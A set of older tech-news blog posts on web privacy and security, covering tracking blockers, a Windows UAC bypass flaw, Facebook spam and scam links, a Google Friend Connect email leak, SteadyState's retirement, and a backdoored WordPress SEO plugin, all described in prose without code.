Each and every website you visit tracks your moments across the internet. This is basically done through cookies, URL redirecting and more. Many of the sites then use this data to customize advertisements displayed to you.
If you are not comfortable with sharing your data with third-party websites, you can now try out a new extension called Disconnect for Google Chrome and RockMeIt browsers.
Disconnect stops major third parties and search engines from tracking the webpages you go to and searches you do. It disable tracking on websites and depersonalizes searches on search engines like Google. It also has a nice little counter to show you the requests it has blocked and an option to easily disable unblocking for certain sites.
Disconnect was written by an ex-Googler who calls this service Web2.1 and claims that he is fixing all the wrongs on the web right now. If you are looking to disable third party tracking head over to http://www.disconnectere.com/ and download the extensions for Chrome or RockMeIt.
When Microsoft added UAC (User Account Control), the promise was that it will make Windows more secure. Pardon me if I come across as a cynic, but all it seems to be capable of doing is annoying users. Yes, Windows 7 makes UAC a lot more bearable, but it’s still annoying. On top of that, it doesn’t actually do a lot to prevent malware attacks or malicious program execution. To make things even worse, a new flaw has been uncovered that can be used to completely bypass UAC in Windows Vista and 7.
The developers of popular security software Pervx spotted a new 0-day vulnerability being discussed in a Chinese forum. According to them, “This is a serious flaw because it resides in win32k.sys, the kernel mode part of the Windows subsystem. It is a privilege escalation exploit which allows even limited user accounts to execute arbitrary code in kernel mode.”
This flaw basically enables an attacker to execute applications with system (full) privileges. Unfortunately, there is not a lot you can do to keep yourself safe at this point of time. Sophos has suggested a workaround; however, it is not known how effective the proposed safety measure is.
Facebook launched their new Facebook messaging service with fanfare saying that it would be a great way to communicate with people, with less spam. However, it looks like they still have quite a lot of work to do with fighting spam in Facebook Messaging.
According to a Business Insider writer, his Facebook Email account has already received a spam message where the sender said that he had won some money and in order to get it, he would have to send some personal details along. Such type of spam messages are very common with regular email and are usually marked as spam by services such as Gmail and Hotmail.
However, Facebook messaging is yet to encounter such messages and will have to filter such messages out and mark it as scam. Facebook Email/Messaging is yet in its infancy and not widely used, so they still have a lot of time on hands before a huge number of users begin to use.
Time to start polishing the rough edges then.. I mean spam filters to track such common spam messages. No?
According to BitDefender, 2 out of 10 Facebook Walls (or Newsfeeds) are infected or at risk in some way. In October, BitDefender, a well known anti-virus and security provider, launched a Facebook app called BitDefender safego. Safego scans your Facebook wall posts to determine if there are any links to bad apps or risky links. Here’s a quote from BitDefender:
BitDefender safego > Since its launch,BitDefender safego has managed to scan 17 million Facebook posts and it has detected infections on the news feeds of around 20% of its users.We are glad we’ve been able to warn our users of these threats and we’ll continue to focus our efforts on adding new security features and increasing our detection rate. Thanks everyone for your feedback and remember: if your friends stay safe, then you’re safe!
In addition to all of Facebook’s privacy problems, everyone should know by now that it’s a huge source of infections for Windows PCs. BitDefender apparently decided that it was time to help warn people about this problem.
The free BitDefender safego app is currently in Beta testing, and you can try it out by visiting the page while logged into Facebook. In addition to the link and app checking abilities of BitDefender safego, it also checks your profile for information that you should not be sharing.
I was fortunate enough to get a clean bill of health from safego, can you say the same thing about your Wall? Give safego a try now to be sure.
With 500+ million people, 500= millions scams are bound to happen. Another one sleazy scam is now underway and it involves showing people "Really cool Facebook revolving images".
The messages is spreading virally and I had to delete around 9 messages from my wall recently. The scam looks to be spreading virally. As always do not click on this link and delete it from your wall if you see it.
P.S. I visited the site in question to see what it had to offer, but it is just a parked page, so nothing to write home about here. Safe Facebooking.
Update: Looks like this scam is spreading differently now. Users are now writing on other people’s walls with the text "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/"
TechCrunch is reporting that an exploit in Google Friend Connect is allowing users to harvest email addresses for logged in users when you visit a website. This exploit was harvested when a user visited guntada.blogspot.com which is now blocked by Google.
According to TechCrunch this happened when you were logged in to your Gmail or Google account. However, only your email address was harvested so this is not only a big security hole but also a big privacy breach.
Once you visited the said site, you would receive an email to your logged in address as shown above. Scary right. Google is already fixing it as we speak, we will update this post once we receive an update from Google.
Update: Google Spokesperson Lily Lin sent us the following statement:
We quickly fixed the issue in the Google Apps Script API that could have allowed for emails to be sent to Gmail users without their permission if they visited a specially designed website while signed into their account. We immediately removed the site that demonstrated this issue, and disabled the functionality soon after. We encourage responsible disclosure of potential application security issues to [email protected]
As enticing as this feature sounds, it is practically impossible to know such kind of information using apps thanks to the restrictions Facebook has put in. So first of all such apps are a farce, and secondly, they are only interested in luring people into clicking on the link you share and then fooling you into sharing it with your friends too.
These kinds of attacks have been very popular on Facebook to spread links that do nothing. Of course most of these scams do little damage, but it spreads virally thanks to the number of users who use Facebook. The newest scam has a link with the text “Check Who Viewed YoUr Fbook Profile – An Easy App to Check Who Viewed YoUr FaceBook Profile. It Really Words So don’t Wait Check Out Now!”
For the record, the screenshot above is filled with references to I am malware site.
Once again, a simple advice to people who use Facebook. Everything that glitters is not gold, likewise, everything with a link and enticing text on Facebook is not real, so stay away from clicking it.
What did Microsoft do that puts libraries at risk?
They retired Windows SteadyState. In case you haven’t heard about it, SteadyState is a free application for Windows XP and Vista which completely protects a Windows operating system from everything except a hardware crash. It makes Windows almost bullet-proof. Thousands of home users, internet cafes, schools and public libraries depend on SteadyState for protection. However, it won’t be available for Windows 7.
According to Yardena,
â€¦ not only is SteadyState incompatible with Win7, Microsoft says it has no plans to introduce a Windows 7-compatible version. That’s leaving some IT managers scrambling for replacement technology and others vowing not to upgrade to Windows 7 at all.
If you settled for the answer given in that Windows Secrets post, you’d give up. In the article, Yardena says:
Third-party solutions, such as Faronics’ Deep Freeze, don’t appeal to cash-strapped educational institutions, which are already spending considerable money upgrading to Windows 7.
Worse yet, if you listen to Microsoft, they’ll tell you that you don’t need it. Here’s the Microsoft spin:
We have just released a whitepaper along with an accompanying document that describes Group Policy settings that you can use to configure computer and user settings and also a reference excel worksheet which can be used to look up and filter the settings described in the whitepaper. (source)
Fortunately, a security company named Comodo, recently released a free replacement for Windows SteadyState. As far as I can tell, Comodo Time Machine does nearly everything SteadyState does. It’s currently supported and works in Windows XP, Vista and 7.
If a librarian or teacher came to me and asked about setting up several public computers , I’d have two ready answers for them. I could save them money and practically guarantee that they wouldn’t have any spyware or virus problems.
1. I’d burn a set of Live CD’s with Edubuntu on them. They could disable the hard drives and put these in the CD Rom drives. Whenever the PC boots up, they’d have a fresh new operating system that’s ready to use and kid-proof.
That plugin is not in the WordPress repository and will never be, but there are thousands of plugins which are already in the repository and thousands which will eventually be part of it. Here is the catch, adding a WordPress plugin to the repository is as easy as sending an email, you just create a legitimate plugin, upload it to SVN and it’s there in the repository for everyone to use.
Now, here is the problem. As far as I believe there are no checks on what code is added to a plugin and to top that there are no checks at all to future updates. In plain words, I can create a legitimate plugin and introduce it to the repository. After that, whatever updates I make to it will never be checked (other than by clever WordPress users who sift through code), since the WordPress plugin updates are based on SVN trunks.
Any new trunks you create will be made available as a update to the end user, regardless of what code you put into it. Now, this may not be alarming since there are hardly any scams related to WordPress plugins within the repository, but today’s event goes on to show that it can be exploited. It does not take much effort to get in a plugin into the repository itself, so a scammer/hacker will be able to create multiple plugins and then add exploit code to it and offer it as updates. By the time the exploit is discovered, it might be too late for users who have already updated and sent out sensitive information to the hacker.
Now, while I am making a valid point here, there is really no foolproof way to stop this problem. Of course, it would help if there are safety checks and maybe a community based checking of code before it actually is made available as an update to users. Community based code checks are hard, if not impossible, because it will involve people to actually check the updated code before it is made available to users. This will also add a hassle to developers who are contributing for free, however, in the end it will be beneficial to everyone.
Now here is the big problem, none of these harmful extensions are available through the repositories, if they are, they are quickly taken off, but people can still go ahead and install these. Just like Firefox has the ability to block extensions (they blocked .NET and WPF add-ons from Microsoft), and Google Chrome has developed features in the browser to block unsafe extensions, WordPress has to take steps to block harmful plugins at the core. They have to have the ability to inform users or explicitly block plugins which are harmful.
Considering how huge a community WordPress has, it would be easy to have a system in place to report unsafe extensions, no matter if they are present in the repository or not, along with providing a friendly warning to users that the plugin they are about to install might be unsafe. In addition to that, they have to move towards encouraging more and more developers to use the WordPress repository for plugins. I had written about the benefits of users adding their plugins to the WP repo on WLTC and saw many developers unhappy with the system, so this might take a while.
If they add this feature, and it works on the fly, it would be one of the best features I could use. Though I am a experienced plugin developer and have coded plugins such as WordPress Automatic Upgrade, I fear for the millions of people who might start adding plugins which are really bad.
Hope WordPress does something about this as this could easily get out of hand. The coder of BlogPress was foolish, he wrote code that could easily be identified, imagine intelligent people being able to write code which cannot be identified and the threats just multiply.
WordPress is an open community and practically anyone can develop plugins or themes for it. However, there are several shady plugins for WordPress out there which you might as well stay away from.
One such plugin is called BlogPress SEO, which promises users hundreds of backlinks once you install it. However, don’t fall for it, it is a trap and will expose your login information to the developer of the plugin and will allow them to automatically login to your blog.
There are couple of blog posts from Yoast and Mtekk which expose the big problems with this plugin. First of all, this plugin stealthily emails your admin email address to the author of the plugin. The second and bigger problem is that, the plugin has a function which allows the plugin author to bypass the WordPress login.
Yes, you read it right, the plugin first emails your admin email to the author and then allows him to login to your WordPress admin without a password. Scary right.
If you have installed the BlogPress SEO plugin, you have to do two things. First of, deactivate the plugin ASAP. Secondly, change your admin email address. Changing your password will do no good. Thirdly, only install plugins which are available in the WordPress repository as they are safe.